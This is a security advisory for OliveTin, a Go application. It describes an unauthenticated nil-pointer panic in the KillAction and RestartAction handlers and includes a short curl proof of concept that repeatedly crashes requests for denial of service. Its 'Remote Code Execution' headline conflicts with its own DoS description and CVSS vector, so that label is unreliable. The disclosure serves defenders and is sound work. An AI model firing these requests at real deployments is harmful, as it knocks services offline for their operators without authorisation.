PT-2026-25579 — Remote Code Execution em Go Github.Com/Olivetin/Olivetin

PT-2026-25579 · Go · Github.Com/Olivetin/Olivetin

Publicado

2026-03-05

Atualizado

2026-03-05

CVSS v3.1

5.3

Média

Vetor

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Summary

An unauthenticated attacker can trigger server-side panics by first creating an execution log entry with a nil binding via StartActionByGet (invalid action ID), then calling KillAction or RestartAction on that tracking ID. This causes a nil-pointer dereference in API handlers and results in repeated per-request panics (Empty reply from server), enabling denial of service through panic/log/CPU amplification.

Details

The issue is caused by this flow:

StartActionByGet accepts arbitrary actionId and still calls executor:

service/internal/api/api.go:239

Executor stores a log entry before binding validation:

service/internal/executor/executor.go:519

If binding is nil, execution stops, but the log entry remains:

service/internal/executor/executor.go:781

KillAction dereferences execReqLogEntry.Binding.Action without checking Binding:

service/internal/api/api.go:79

RestartAction has the same unsafe dereference:

service/internal/api/api.go:1285

Because the dereference happens before authorization checks in these handlers, this is reachable unauthenticated.

PoC

Environment:

OliveTin default single frontend on http://localhost:1337
Reproduced on main (commit 235493e) and tag 3000.11.0

Create orphan tracking ID with invalid action:

bash

T=$(curl -s -X POST http://localhost:1337/api/StartActionByGet 
 -H 'Content-Type: application/json' 
 --data '{"actionId":"does-not-exist"}' 
 | sed -n 's/.*"executionTrackingId":"([^"]*)".*/1/p')
echo "$T"

2. Trigger panic in RestartAction:

curl -v -X POST http://localhost:1337/api/RestartAction 
 -H 'Content-Type: application/json' 
 --data "{"executionTrackingId":"$T"}"

3. Trigger panic in KillAction:

curl -v -X POST http://localhost:1337/api/KillAction 
 -H 'Content-Type: application/json' 
 --data "{"executionTrackingId":"$T"}"

Observed client output:

- curl: (52) Empty reply from server

Observed server log:

- panic serving ... runtime error: invalid memory address or nil pointer dereference
- stack points to:
  - service/internal/api/api.go:79 (KillAction)
  - service/internal/api/api.go:1285 (RestartAction)

Impact

This is an unauthenticated denial-of-service vulnerability (panic-based request disruption and log/CPU amplification). An attacker can repeatedly trigger panics remotely without credentials, degrading service reliability and observability.

Correção

RCE

NULL Pointer Dereference

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-20CWE-476

Identificadores relacionados

GHSA-FWHJ-785H-43HH

Produtos afetados

Github.Com/Olivetin/Olivetin